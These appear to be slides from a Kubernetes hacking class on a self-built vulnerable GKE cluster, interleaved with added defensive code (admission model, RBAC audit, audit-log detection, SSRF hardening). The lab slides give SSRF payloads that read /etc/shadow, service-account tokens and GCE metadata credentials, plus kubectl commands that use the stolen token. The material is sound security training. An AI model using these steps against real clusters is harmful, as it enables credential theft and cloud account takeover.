Appsecco Kubernetes Hacking Masterclass. The slides used during the class with links to the commands, scripts and setup information.
These slides are to be used with the masterclass video recording on YouTube -
Hands on exercises are highly recommended to get the most out of this class!
2. What will we do today?
1. Deploy a GKE cluster in our own accounts and set up some misconfigurations to exploit
2. Talk about some relevant Kubernetes controls for today's masterclass
3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster
4. Q&A
To use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
4. Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET!
https://appsecco-masterclass.s3.amazonaws.com/commands.txt
Log in to the Google Cloud Console and, in the same browser, open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell.
https://console.cloud.google.com/
https://shell.cloud.google.com/?show=terminal
5. Make sure you run the commands from the Google CloudShell
1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing.
2. Note the IP address printed at the end of the command
7. Kubernetes, and the cloud platform it is run on top of, have multiple security features and controls built into the environment.
• As hackers we rely on these to be misconfigured or absent :)
We will look at 2 main security concepts in Kubernetes, relevant to our class today:
1. Pod Security Admission
2. Role Based Access Control
8. 1. Let's create 2 namespaces each with a different Pod Security Standard
2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces
o kubectl apply -f restricted-namespace.yaml
o kubectl apply -f privileged-namespace.yaml
3. Now attempt to start a privileged pod within each of the namespaces
o kubectl get ns
o kubectl apply -f nginx-privileged.yaml -n privileged-namespace
o kubectl apply -f nginx-privileged.yaml -n restricted-namespace
4. What do you see?
9. Pod Admission Controller – In simple terms
• This is code inside the API server that intercepts incoming requests and verifies whether the object (pod, namespace etc.) create request passes a list of allowed checks or not.
o The list of checks the request is compared against is called the Pod Security Standards
o There are 3 standards - privileged, baseline, and restricted
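To make the lab result from slide 8 reproducible without a cluster, here is an added example (not code from the masterclass or from Kubernetes itself) that models the decision Pod Security Admission makes for a subset of the Pod Security Standards checks. The namespace manifests and the two pod specs are constructed to resemble the lab's restricted-namespace.yaml, privileged-namespace.yaml and nginx-privileged.yaml; their exact contents are assumed. The only Kubernetes identifier taken as real is the `pod-security.kubernetes.io/enforce` namespace label the controller reads.

```python
"""Offline model of the Pod Security Admission decision (added example; not code
from the masterclass or from Kubernetes). Implements a subset of the Pod Security
Standards so the lab outcome can be reproduced: a privileged pod is admitted in the
privileged namespace and rejected in the restricted one."""
from typing import Dict, List

# Label that the real Pod Security Admission controller reads from the namespace.
ENFORCE_LABEL = "pod-security.kubernetes.io/enforce"

# Constructed namespaces mirroring restricted-namespace.yaml / privileged-namespace.yaml.
NAMESPACES: Dict[str, Dict] = {
    "restricted-namespace": {"metadata": {"labels": {ENFORCE_LABEL: "restricted"}}},
    "privileged-namespace": {"metadata": {"labels": {ENFORCE_LABEL: "privileged"}}},
}

# Constructed pod resembling nginx-privileged.yaml: one privileged container, nothing else set.
PRIVILEGED_POD: Dict = {
    "metadata": {"name": "nginx-privileged"},
    "spec": {"containers": [{"name": "nginx", "image": "nginx",
                             "securityContext": {"privileged": True}}]},
}

# Constructed pod that satisfies the restricted subset checked below.
HARDENED_POD: Dict = {
    "metadata": {"name": "nginx-restricted"},
    "spec": {
        "securityContext": {"runAsNonRoot": True,
                            "seccompProfile": {"type": "RuntimeDefault"}},
        "containers": [{"name": "nginx", "image": "nginx",
                        "securityContext": {"allowPrivilegeEscalation": False,
                                            "capabilities": {"drop": ["ALL"]}}}],
    },
}


def _containers(pod: Dict) -> List[Dict]:
    spec = pod.get("spec", {})
    return list(spec.get("containers", [])) + list(spec.get("initContainers", []))


def baseline_violations(pod: Dict) -> List[str]:
    """Subset of the 'baseline' standard: no privileged containers, no host namespaces."""
    spec = pod.get("spec", {})
    problems = [f"spec.{k} is true" for k in ("hostNetwork", "hostPID", "hostIPC") if spec.get(k)]
    for c in _containers(pod):
        if c.get("securityContext", {}).get("privileged"):
            problems.append(f"container {c['name']} is privileged")
    return problems


def restricted_violations(pod: Dict) -> List[str]:
    """Subset of 'restricted': baseline plus non-root, no privilege escalation, all
    capabilities dropped and a seccomp profile. Container-level settings override
    pod-level ones, as in the real standard."""
    problems = baseline_violations(pod)
    pod_sc = pod.get("spec", {}).get("securityContext", {})
    for c in _containers(pod):
        sc = c.get("securityContext", {})
        if sc.get("allowPrivilegeEscalation", True):
            problems.append(f"container {c['name']} allows privilege escalation")
        if not sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot", False)):
            problems.append(f"container {c['name']} is not required to run as non-root")
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            problems.append(f"container {c['name']} does not drop ALL capabilities")
        seccomp = sc.get("seccompProfile", pod_sc.get("seccompProfile", {})).get("type")
        if seccomp not in ("RuntimeDefault", "Localhost"):
            problems.append(f"container {c['name']} has no RuntimeDefault/Localhost seccomp profile")
    return problems


CHECKS = {
    "privileged": lambda pod: [],  # the privileged level allows anything
    "baseline": baseline_violations,
    "restricted": restricted_violations,
}


def admit(pod: Dict, namespace: str) -> List[str]:
    """Return the violations the enforce level on `namespace` would reject the pod for
    (empty list means admitted). Namespaces without the label default to privileged."""
    labels = NAMESPACES[namespace]["metadata"].get("labels", {})
    return CHECKS[labels.get(ENFORCE_LABEL, "privileged")](pod)


if __name__ == "__main__":
    for ns in NAMESPACES:
        for pod in (PRIVILEGED_POD, HARDENED_POD):
            v = admit(pod, ns)
            print(f"{pod['metadata']['name']} in {ns}: "
                  + ("admitted" if not v else "rejected: " + "; ".join(v)))
```

The real controller reports the same categories of failure in the `kubectl apply` error message; the point of the model is that the decision is driven entirely by the namespace label, so an attacker who can create or relabel namespaces can choose the level that applies to their pods.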
10. Let's enumerate what roles and clusterroles are present in this cluster and how they are bound
1. Enumerate roles within the kube-system namespace
o kubectl get roles -n kube-system
o kubectl get rolebindings -n kube-system
2. For each of the rolebindings enumerate the subject attached
o kubectl get rolebindings <BINDING_NAME> -n kube-system -o yaml
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud-provider --list
11. Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC
1. Enumerate clusterroles across the cluster
o kubectl get clusterroles
o kubectl get clusterrolebindings
2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached
o kubectl get clusterrolebindings <BINDING_NAME> -o yaml
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:apps:default --list
12. Role and ClusterRole and Bindings
• An RBAC Role or ClusterRole contains rules that represent a set of permissions. Permissions are purely additive (there are no "deny" rules).
• A Role always sets permissions within a particular namespace; when you create a Role, you have to specify the namespace it belongs in.
• ClusterRole is a non-namespaced resource and applies to the entire cluster.
• Bindings allow the Role or ClusterRole to be bound to a subject (users, groups, or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions.
• If you want to define a role within a namespace, use a Role; if you want to define a role cluster-wide, use a ClusterRole.
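The enumeration in slides 10 and 11 is done by hand, one binding at a time. As an added example (not code from the masterclass), the script below automates the same walk over the JSON that `kubectl get clusterroles,clusterrolebindings,roles,rolebindings -A -o json` emits: resolve each binding's roleRef to its Role or ClusterRole, inspect the rules, and report the subjects that end up with rules worth a second look. The bundle embedded in the script is a constructed sample that reuses the two service account names from the slides; it is not a dump of the lab cluster.

```python
"""Offline RBAC audit over kubectl JSON output (added example; not code from the
masterclass). Finds subjects bound, via Role/ClusterRole, to rules that grant
wildcard access, secret reads, pod exec, or the ability to change RBAC itself."""
import json
from typing import Dict, List, Tuple

# Constructed sample in the shape of `kubectl get ... -o json` (a List with items).
SAMPLE_BUNDLE = json.loads(r'''{"items": [
 {"kind": "ClusterRole", "metadata": {"name": "cluster-admin"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]},
            {"nonResourceURLs": ["*"], "verbs": ["*"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "view"},
  "rules": [{"apiGroups": [""], "resources": ["pods", "services"], "verbs": ["get", "list", "watch"]}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "apps-default-admin"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "apps"}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "dev-viewers"},
  "roleRef": {"kind": "ClusterRole", "name": "view"},
  "subjects": [{"kind": "Group", "name": "dev-team"}]},
 {"kind": "Role", "metadata": {"name": "pod-exec", "namespace": "kube-system"},
  "rules": [{"apiGroups": [""], "resources": ["pods/exec"], "verbs": ["create"]}]},
 {"kind": "RoleBinding", "metadata": {"name": "cloud-provider-exec", "namespace": "kube-system"},
  "roleRef": {"kind": "Role", "name": "pod-exec"},
  "subjects": [{"kind": "ServiceAccount", "name": "cloud-provider", "namespace": "kube-system"}]}
]}''')

EXEC_RESOURCES = {"pods/exec", "pods/attach", "pods/portforward"}
RBAC_RESOURCES = {"roles", "rolebindings", "clusterroles", "clusterrolebindings"}


def rule_reasons(rule: Dict) -> List[str]:
    """Why a single RBAC rule is risky; empty list if it looks benign."""
    verbs, resources = set(rule.get("verbs", [])), set(rule.get("resources", []))
    reasons = []
    if "*" in verbs or "*" in resources:
        reasons.append("wildcard verb or resource")
    if "secrets" in resources and verbs & {"get", "list", "watch"}:
        reasons.append("can read secrets (service account tokens, credentials)")
    if resources & EXEC_RESOURCES and "create" in verbs:
        reasons.append("can exec/attach into pods")
    if verbs & {"bind", "escalate", "impersonate"}:
        reasons.append("can bind/escalate/impersonate")
    if resources & RBAC_RESOURCES and verbs & {"create", "update", "patch"}:
        reasons.append("can modify RBAC objects")
    return reasons


def subject_name(subject: Dict) -> str:
    """Render a subject the way `kubectl auth can-i --as` expects it."""
    if subject["kind"] == "ServiceAccount":
        return f"system:serviceaccount:{subject['namespace']}:{subject['name']}"
    return f"{subject['kind']}:{subject['name']}"


def audit(bundle: Dict) -> List[Dict]:
    """Return one finding per (binding, subject) whose bound role has risky rules."""
    items = bundle["items"]
    # Roles keyed by (kind, namespace, name); ClusterRoles have an empty namespace.
    roles: Dict[Tuple[str, str, str], Dict] = {
        (o["kind"], o["metadata"].get("namespace", ""), o["metadata"]["name"]): o
        for o in items if o["kind"] in ("Role", "ClusterRole")
    }
    findings = []
    for b in items:
        if b["kind"] not in ("RoleBinding", "ClusterRoleBinding"):
            continue
        ref = b["roleRef"]
        # A RoleBinding may reference a Role in its own namespace or any ClusterRole.
        ns = b["metadata"].get("namespace", "") if ref["kind"] == "Role" else ""
        role = roles.get((ref["kind"], ns, ref["name"]))
        if role is None:
            continue  # dangling roleRef grants nothing
        reasons = sorted({r for rule in role.get("rules", []) for r in rule_reasons(rule)})
        if not reasons:
            continue
        for s in b.get("subjects", []):
            findings.append({
                "binding": f"{b['kind']}/{b['metadata']['name']}",
                "scope": b["metadata"].get("namespace", "cluster-wide"),
                "subject": subject_name(s),
                "role": f"{ref['kind']}/{ref['name']}",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_BUNDLE):
        print(f"{f['subject']} via {f['binding']} ({f['scope']}) -> {f['role']}: "
              + ", ".join(f["reasons"]))
```

Because RBAC is additive, a subject's effective access is the union of every binding that names it or one of its groups, so a real audit should also fold in group membership (for example `system:serviceaccounts` and `system:authenticated`), which this sample does not model.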
15. • All pods will have access to the default service account's token, mounted as files within the pod at
o /var/run/secrets/kubernetes.io/serviceaccount/token
o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
• We can extract them and use them to interact with the cluster
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
So how do we gain access to this service account or files from the pod?
16. • Let's take a closer look at the app that was deployed
• Log in to the application using username serveradmin and password monitorworld
• What is the app's functionality?
• What vulnerability is present here?
17. • The application takes a URL from the user and makes a server side request on the user's behalf
o Such a feature, if not protected properly, is often vulnerable to Server Side Request Forgery (SSRF/XSPA)
• Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files!
• Try these as input
o file:///etc/passwd
o file:///etc/shadow
18. • Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell.
o file:///var/run/secrets/kubernetes.io/serviceaccount/token
o file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt
• Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
• Use the auth plugin to view your current access with the stolen credentials
o kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt --list
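From the defender's side, the steps in slides 15 and 18 leave a clear trace in the API server audit log: a service account identity making requests from an address that is not a pod or node, and, for `kubectl auth can-i --list`, the creation of a SelfSubjectRulesReview. The script below is an added example (not from the masterclass) that runs those two checks over constructed audit events in the `audit.k8s.io/v1` shape; the pod and node CIDRs are assumed values, not the lab cluster's.

```python
"""Detection over Kubernetes API audit events (added example; not from the
masterclass). Flags service account tokens used from outside the cluster and
service accounts enumerating their own permissions."""
import ipaddress
import json
from typing import Dict, List

# Assumed pod and node ranges for the cluster; any other source address is "outside".
CLUSTER_CIDRS = [ipaddress.ip_network("10.4.0.0/14"), ipaddress.ip_network("10.128.0.0/20")]

# Resources created by `kubectl auth can-i` / `can-i --list`; workloads rarely need them.
ENUMERATION_RESOURCES = {"selfsubjectrulesreviews", "selfsubjectaccessreviews"}

# Constructed audit log, one JSON event per line, fields trimmed to what the rules need.
SAMPLE_AUDIT_LOG = "\n".join([
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
                "verb": "get", "requestURI": "/api/v1/namespaces/apps/configmaps/app-config",
                "user": {"username": "system:serviceaccount:apps:default"},
                "sourceIPs": ["10.4.1.12"], "userAgent": "monitor-app/1.0",
                "objectRef": {"resource": "configmaps", "namespace": "apps", "name": "app-config"}}),
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
                "verb": "list", "requestURI": "/api/v1/nodes",
                "user": {"username": "system:serviceaccount:apps:default"},
                "sourceIPs": ["203.0.113.45"], "userAgent": "kubectl/v1.29.0 (linux/amd64)",
                "objectRef": {"resource": "nodes"}}),
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
                "verb": "create", "requestURI": "/apis/authorization.k8s.io/v1/selfsubjectrulesreviews",
                "user": {"username": "system:serviceaccount:apps:default"},
                "sourceIPs": ["203.0.113.45"], "userAgent": "kubectl/v1.29.0 (linux/amd64)",
                "objectRef": {"resource": "selfsubjectrulesreviews"}}),
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
                "verb": "list", "requestURI": "/api/v1/namespaces/apps/pods",
                "user": {"username": "admin@example.com"},
                "sourceIPs": ["203.0.113.45"], "userAgent": "kubectl/v1.29.0 (linux/amd64)",
                "objectRef": {"resource": "pods", "namespace": "apps"}}),
])


def parse_events(text: str) -> List[Dict]:
    """Parse newline-delimited audit events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def _outside_cluster(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True  # unparsable source: surface it rather than silently pass
    return not any(addr in net for net in CLUSTER_CIDRS)


def suspicious_service_account_use(events: List[Dict]) -> List[Dict]:
    """Findings for service account identities used from outside the cluster or used
    to enumerate their own permissions. Human users are out of scope for these rules."""
    findings = []
    for ev in events:
        user = ev.get("user", {}).get("username", "")
        if not user.startswith("system:serviceaccount:"):
            continue
        reasons = []
        external = [ip for ip in ev.get("sourceIPs", []) if _outside_cluster(ip)]
        if external:
            reasons.append(f"token used from outside the cluster: {', '.join(external)}")
        resource = ev.get("objectRef", {}).get("resource", "")
        if ev.get("verb") == "create" and resource in ENUMERATION_RESOURCES:
            reasons.append(f"permission enumeration via {resource}")
        if reasons:
            findings.append({"user": user, "verb": ev.get("verb"), "resource": resource,
                             "sourceIPs": ev.get("sourceIPs", []),
                             "userAgent": ev.get("userAgent", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_service_account_use(parse_events(SAMPLE_AUDIT_LOG)):
        print(f"{f['user']} {f['verb']} {f['resource']} from {f['sourceIPs']} "
              f"({f['userAgent']}): " + "; ".join(f["reasons"]))
```

The user agent is kept in each finding because a workload's own client library and a `kubectl` binary usually announce themselves differently, which is a cheap second signal when the source address alone is ambiguous (for example behind NAT).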
21. We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions
1. Dump env data. This will reveal env variables that can contain secrets, Kubernetes/GKE information etc.
• file:///proc/self/environ
2. Read the node Instance Metadata using the SSRF to fetch the kubelet credentials
• http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env
3. Fetch the Google VM instance's compute service account's token and scopes to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment.
• http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
• http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes
• http://169.254.169.254/computeMetadata/v1/project/project-id
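Slides 17, 18 and 21 all rely on one flaw: the application hands the user's URL to its HTTP library with no policy on scheme or destination. The following added example (not the masterclass app's code, whose language and request library are not shown) puts the vulnerable fetch next to a hardened one that allow-lists schemes, refuses hosts resolving to non-public addresses (which covers the link-local metadata address), and re-applies the same check on every redirect hop. The hostnames and addresses in the demo are constructed; `metadata.google.internal` is included because it is the DNS alias GCE provides for the metadata server.

```python
"""Vulnerable vs hardened server-side fetch (added example; not the masterclass
app's code). The vulnerable function is why file:// and 169.254.169.254 work in the
lab; the hardened one enforces a destination policy before and during the request."""
import ipaddress
import socket
from typing import Callable, List, Optional, Union
from urllib.parse import urlsplit
from urllib.request import HTTPRedirectHandler, build_opener, urlopen


def fetch_vulnerable(url: str) -> bytes:
    """The flaw: no validation at all. urllib serves file:// and link-local http:// alike."""
    with urlopen(url) as resp:
        return resp.read()


class BlockedURL(ValueError):
    """Raised when a URL fails the server-side fetch policy."""


ALLOWED_SCHEMES = {"http", "https"}
# Hostnames refused outright; metadata.google.internal is GCE's alias for 169.254.169.254.
DENIED_HOSTS = {"localhost", "metadata.google.internal", "metadata"}

Resolver = Callable[[str], List[str]]
IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def _dns_resolve(host: str) -> List[str]:
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def _is_public(ip: IPAddress) -> bool:
    # is_global already excludes loopback, RFC1918, link-local (169.254.0.0/16) and 0.0.0.0.
    return ip.is_global and not ip.is_multicast


def validate_url(url: str, resolver: Optional[Resolver] = None) -> str:
    """Return url unchanged if it is http(s) to a public address; raise BlockedURL otherwise.
    `resolver` maps a hostname to its addresses (real DNS by default; tests inject a fake)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise BlockedURL(f"scheme {parts.scheme!r} is not allowed")
    host = parts.hostname
    if not host:
        raise BlockedURL("URL has no host")
    if host.lower() in DENIED_HOSTS:
        raise BlockedURL(f"host {host!r} is denied")
    try:
        addrs: List[IPAddress] = [ipaddress.ip_address(host)]  # IP literal, no DNS needed
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in (resolver or _dns_resolve)(host)]
        except (socket.gaierror, ValueError) as exc:
            raise BlockedURL(f"cannot resolve {host!r}: {exc}") from exc
    if not addrs:
        raise BlockedURL(f"{host!r} resolved to nothing")
    for ip in addrs:  # every answer must be public, not just the first one
        if not _is_public(ip):
            raise BlockedURL(f"{host!r} resolves to non-public address {ip}")
    return url


def is_blocked(url: str, resolver: Optional[Resolver] = None) -> bool:
    """The policy decision alone, as a boolean."""
    try:
        validate_url(url, resolver)
        return False
    except BlockedURL:
        return True


class ValidatingRedirectHandler(HTTPRedirectHandler):
    """Apply the same policy to each redirect target, so a public host cannot bounce
    the server to file:// or to the metadata address."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        validate_url(newurl)
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_hardened(url: str, timeout: float = 5.0) -> bytes:
    validate_url(url)
    with build_opener(ValidatingRedirectHandler()).open(url, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    for candidate in ("https://8.8.8.8/", "file:///etc/passwd",
                      "file:///var/run/secrets/kubernetes.io/serviceaccount/token",
                      "http://169.254.169.254/computeMetadata/v1/project/project-id",
                      "http://localhost:8080/"):
        print(f"{'BLOCKED' if is_blocked(candidate) else 'allowed'}  {candidate}")
```

Validate-then-connect still leaves a DNS rebinding window (the name can answer with a public address at check time and a private one at connect time); production code closes it by connecting to the address that passed validation rather than resolving a second time. On GKE, requiring the `Metadata-Flavor: Google` header and enabling Workload Identity or metadata concealment reduce what an SSRF can reach at 169.254.169.254 independently of the application fix.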
28. • Riyaz Walikar, Chief Hacker, runs the Kubernetes Penetration Testing as a Service at Appsecco
• Appsecco is a boutique security consulting company with customers across the world.
• Over a decade and a half of experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers
• Love to teach! Speak and train at a bunch of conferences!
https://www.linkedin.com/in/riyazw/
riyaz@appsecco.com | +91 9886042242
https://appsecco.com | https://blog.appsecco.com
29. About Appsecco
Pragmatic, holistic, business-focused approach
Specialist Cloud and Application Security company
Highly experienced and diverse team
Assigned multiple CVEs
Certified hackers
OWASP chapter leads
Cloud and Kubernetes security experts
Black Hat & Def Con speakers